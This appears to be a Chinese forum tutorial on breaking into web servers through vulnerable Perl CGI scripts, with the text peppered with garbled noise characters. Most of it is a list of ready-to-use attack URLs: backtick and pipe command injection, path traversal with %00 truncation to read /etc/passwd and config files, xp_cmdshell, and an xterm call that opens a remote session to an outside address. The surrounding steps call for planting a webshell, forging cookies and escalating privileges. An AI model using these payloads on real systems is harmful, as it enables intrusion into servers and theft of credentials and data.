总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着
7 f/ Q3 F! g/ Z- Wcookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
; ^$ P% Y: d# v0 ^感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们
) ?; j5 j9 P7 M4 R注“
3 r: a* n6 ~4 V, e _# sperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 , I# r4 e g. J' q( |
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
3 k! d7 K# `1 f8 S' e* a* [% g9 C- T
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造 9 D B u5 s3 y& C- c" d. e( C% a
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
* Y$ v% h3 j+ S. mhttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号
~( w0 T: W0 F. i) p* |: Ihttp://target.com/cgi-bin/home/news/sub.pl?`id`
i: f$ w G# i1 |6 nhttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a` 1 Y5 l y6 V# }1 L. G4 @% g1 s; e0 n
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示
; J' S2 u6 ~( E7 u) x
5 O B) A2 K8 j+ M& Y \; Ohttp://target.com/test.pl;ls|
9 K# B) T6 m1 z& ihttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| 9 }6 B) M0 v) p7 Z) Q
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|
7 V, a+ ^6 f! Xhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造 ( c' W6 B9 T9 y- E3 W
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。
- ~8 J* ?* X! \7 @ Whttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection ) Y* w1 w$ |7 V9 V. A8 j
. X; V: y- M$ r0 {http://target.com/test.pl?&........ /../../etc/passwd ! I3 l+ `% _# z) G+ J% n! j
+ V9 ^, J/ { Q) Y2 S( k" v3 `
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./
& `) O8 R4 d J1 Thttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了 8 B9 C4 P5 ^" C) |, K
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00
% V& w d& H2 }: c2 S
8 S! v% G5 k9 B% `/ W- `/ hhttp://www.target.org/show.php?f ... /include/config.php 查看php代码
' ?2 R* ^+ H: Khttp://www.target.org/show.php?f ... ng/admin/global.php # W5 q( Y4 R. |8 j8 L
5 |8 w/ P0 k. _/ Y y. Cemm和ps的一句话$ y' I' ~& Y5 b( }) M7 s( ] g
& {* _5 Y! m6 C, u f3 |9 R! k
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 - v4 ~. t7 W( B6 i9 @8 D
9 ~ X. w. F% |2 C0 h8 q>bbb%20| " B" j$ Y, b+ W* K3 E; T A
0 B3 W, d w" G
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串
5 ~0 L" |7 i" b' `/ r! |2 [4 h, g* i: a* N# { r
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征
0 A2 I2 }' j1 P p$ h; J) i7 yhttp://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin
4 l# v( J+ x7 V2 ^& r
4 t& H; g0 W6 v' w/ u相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法 ) r" a0 c {' V; n% V
http://target.com/index.html#cmd.exe / P- ]6 g+ {, Y5 O
http://target.com/index.html?dummyparam=xp_cmdshell % u9 V+ _* }7 I
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
2 M+ y; a2 _ y, j# g; I$ q% Z |